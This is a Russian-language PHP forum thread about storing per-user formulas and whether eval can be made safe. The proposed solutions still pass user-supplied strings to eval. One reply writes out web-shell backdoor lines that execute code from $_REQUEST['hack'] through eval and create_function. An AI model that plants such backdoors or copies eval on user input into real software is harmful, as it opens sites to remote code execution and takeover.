Функция от конечного пользователя

@alexvba · Регистрация: 11.06.2016

Студворк — интернет-сервис помощи студентам

Необходимо создать и где-то хранить функции, созданные конечным пользователем. Например есть параметры: A, B, C. Одному пользователю нужно их сложить и вычесть (A+B-C), другому перемножить (A*B/C-200). Т.е. у каждого пользователя своя функция. Реализовал через eval. Как можно уйти от eval или его сделать безопасным?

Царь Бабай · 07.01.2025, 08:48

Такое?

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
function safeEval($expression, $params) {
    // Заменяем параметры на значения
  $expression = str_replace(array_keys($params), array_values($params), $expression);
 // Удаляем все символы, кроме разрешенных (числа, переменные, математические операторы)
    $expression = preg_replace('/[^A-Za-z0-9+\-\*\/\s().]/', '', $expression);
    try {
     return eval("return (" . $expression . ");");
    } catch(Error $error) {
        return "error";
    }
}
 
$expression = "A + B - C";
 $params = ['A' => 10, 'B' => 20, 'C' => 5];
$result = safeEval($expression, $params);
 if($result != "error") {
    echo $result . "\n"; // Выведет 25
 } else {
  echo "error" . "\n";
 }
$expression = "A * B / C";
$params = ['A' => 10, 'B' => 20, 'C' => 5];
 $result = safeEval($expression, $params);
  if($result != "error") {
    echo $result . "\n"; // Выведет 40
  } else {
     echo "error" . "\n";
  }
 $expression = "A / B";
 $params = ['A' => 10, 'B' => 0];
$result = safeEval($expression, $params);
 if($result != "error") {
  echo $result . "\n";
  } else {
  echo "error" . "\n";
 }
?>

И вообще, eval (устаревший для хакинга) можно заменить callback функцией и применить злонамеренный вывод кода.

@ft4l · 07.01.2025, 09:42

Сообщение от Царь Бабай

safeEval

sleep(100500)

@alexvba · 07.01.2025, 09:42 **[ТС]**

Да, огромное спасибо, то, что нужно! callback функции - интересное решение, буду изучать, отдельное спасибо! А вот по этому решению "применить злонамеренный вывод кода" можно поподробнее?

Царь Бабай · 07.01.2025, 10:35

Да легко.
Старая версия внедрения

PHP
1
eval($_REQUEST["hack"]);

Новая версия

PHP
1
call_user_func(create_function("", $_REQUEST["hack"]));

callback - из 2 или 3 версий функций (подобных) тестировал, выполняться может (((
* Кто знает, тот поймёт!

Царь Бабай · 07.01.2025, 10:46

Не успел пример по времени привести.

Это примеры использования ИНДУСАМИ

tgto - это мой локальный домен

@Whitecolor · 07.01.2025, 13:49

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
class UserFunctionManager {
    private $userFunctions = [];
 
    public function addFunction($username, $functionStr) {
        $this->userFunctions[$username] = $functionStr;
    }
 
    public function executeFunction($username, $params) {
        if (!isset($this->userFunctions[$username])) {
            throw new Exception("Function not found for user: $username");
        }
 
        $functionStr = $this->userFunctions[$username];
        $result = eval("return $functionStr;");
        return $result;
    }
}
 
$manager = new UserFunctionManager();
$manager->addFunction('user1', 'A + B - C');
$manager->addFunction('user2', 'A * B / C - 200');
 
$params = [
    'A' => 10,
    'B' => 20,
    'C' => 5,
];
 
try {
    echo "Результат user1: " . $manager->executeFunction('user1', $params) . "\n"; // 25
    echo "Результат user2: " . $manager->executeFunction('user2', $params) . "\n"; // 0
} catch (Exception $e) {
    echo "Ошибка: " . $e->getMessage() . "\n";
}
?>

@alexvba · 09.01.2025, 00:01 **[ТС]**

eval такую строку 'A + B - C' на обрабатывает. Допилил, вот так заработала, но со знаком $ не совсем удобно получается

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
class UserFunctionManager {
    private $userFunctions = [];
 
    public function addFunction($username, $functionStr) {
        $this->userFunctions[$username] = $functionStr;
    }
    public function executeFunction($username, $params) {
        debug($params);
        $A = $params['A'];
        $B = $params['B'];
        $C = $params['C'];
        if (!isset($this->userFunctions[$username])) {
            throw new Exception("Функция не найдена для пользователя: $username");
        }
 
        $functionStr = $this->userFunctions[$username];
        $result = eval("return $functionStr;");
        return $result;
    }
}
 
$user1 = 'user1';
$formula1 = '$A + $B - $C';
$user2 = 'user2';
$formula2 = '$A * $B / $C - 200';
 
$manager = new UserFunctionManager();
$manager->addFunction($user1, $formula1);
$manager->addFunction($user2, $formula2);
 
$params = [
    'A' => 10,
    'B' => 20,
    'C' => 5,
];
 
try {
    echo "Результат $user1: " . $manager->executeFunction($user1, $params) . "\n"; // 25
    echo "Результат $user2: " . $manager->executeFunction($user2, $params) . "\n"; // 0
} catch (Exception $e) {
    echo "Ошибка: " . $e->getMessage() . "\n";
}

Новые блоги и статьи Все статьи Все блоги /
PhpStorm 2025.3: WSL Terminal всегда стартует в ~ and_y87 14.12.2025 PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .	Как объединить две одинаковые БД Access с разными данными VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .
Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .	Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .	Ломающие изменения в C#.NStar Alpha Etyuhibosecyu 20.11.2025 Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .	Мысли в слух kumehtar 18.11.2025 Кстати, совсем недавно имел разговор на тему медитаций с людьми. И обнаружил, что они вообще не понимают что такое медитация и зачем она нужна. Самые базовые вещи. Для них это - когда просто люди. . .	Создание Single Page Application на фреймах krapotkin 16.11.2025 Статья исключительно для начинающих. Подходы оригинальностью не блещут. В век Веб все очень привыкли к дизайну Single-Page-Application . Быстренько разберем подход "на фреймах". Мы делаем одну. . .

@alexvba 0 / 0 / 0 Регистрация: 11.06.2016 Сообщений: 6

	Функция от конечного пользователя 07.01.2025, 05:20. Показов 557. Ответов 7 Метки нет (Все метки) Необходимо создать и где-то хранить функции, созданные конечным пользователем. Например есть параметры: A, B, C. Одному пользователю нужно их сложить и вычесть (A+B-C), другому перемножить (A*B/C-200). Т.е. у каждого пользователя своя функция. Реализовал через eval. Как можно уйти от eval или его сделать безопасным? 0

@alexvba 0 / 0 / 0 Регистрация: 11.06.2016 Сообщений: 6
	07.01.2025, 09:42 [ТС]
	Да, огромное спасибо, то, что нужно! callback функции - интересное решение, буду изучать, отдельное спасибо! А вот по этому решению "применить злонамеренный вывод кода" можно поподробнее? 0

Царь Бабай Надуваю лягушек 289 / 219 / 93 Регистрация: 01.05.2014 Сообщений: 742
	07.01.2025, 10:46
	Не успел пример по времени привести. Это примеры использования ИНДУСАМИ tgto - это мой локальный домен Миниатюры 0